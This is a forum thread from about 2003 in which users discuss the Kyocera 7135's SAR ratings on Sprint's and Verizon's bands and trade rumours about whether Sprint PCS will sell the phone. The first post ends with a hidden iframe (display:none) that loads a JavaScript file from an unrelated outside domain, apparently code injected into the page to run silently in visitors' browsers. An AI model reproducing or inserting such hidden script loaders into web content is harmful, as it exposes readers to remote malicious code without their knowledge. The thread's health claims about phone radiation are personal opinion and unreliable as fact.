+ Reply to Thread

Fantastic 7135 Sprint PCS SAR Ratings

For those of us that are concerned with the health aspects of cell phone use (i.e. not frying our brains while using our phones!), it is ironic to note that the 7135 will apparently not be released by Sprint.

The 7135's SAR results on the CDMA 1900 band, i.e. Sprint PCS's frequency, are among the best of any phone ever! Specifically, they are in the range of 5 to 10 times better than the typical phone. Also, much better than the SAR results for the i500.

By not offering the 7135, Sprint is denying us the ability to use one of the safest phones with one of the best plans (unlimited Vision, etc.).

This is almost criminal - especially since they apparently intend to offer us the i500 instead, which is much worse. Who knows, maybe there will be a future lawsuit in the future over this issue!

For you Verizon customers (CDMA 800), the 7135's SAR performance is very good, but nowhere near as good as its Sprint performance<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    the jury is still out on the decision of sprint to have this phone or not.. they have heard our pleas on this forum and others and i do believe they may step up to the plate.

Originally posted by marctronixx
    i do believe they may step up to the plate.
    Let's hope so!
    Nicky

I have a contact in Kansas City that was a founding employee of SprintPCS. I was told back in September and had it confirmed again today...1/17/03...that SprintPCS will not offer this phone "because we will have other products with the same or better features than the Kyocera 7135." I am very doubtful that SprintPCS will ever offer this phone.

Fut
    Originally posted by knotcounting
    I have a contact in Kansas City that was a founding employee of SprintPCS. I was told back in September and had it confirmed again today...1/17/03...that SprintPCS will not offer this phone "because we will have other products with the same or better features than the Kyocera 7135." I am very doubtful that SprintPCS will ever offer this phone.
    Ok now that's just nutty- the only thing that seems at all comparable is the i500 and maybe the thera (pushing it). Small size in flip phone/ palm OS/ mp3 player/ SDIO...and many other features are not even offered on almost their entire current lineup and predicted lineup for some time to come. Are we supposed to be wowed by some magical phone that no one has heard about?

Maybe they were confused with a different model Kyocera?
    iPhone therefore iAm.

Administrator
    it aint over till its over...

and i suspect it ain't over yet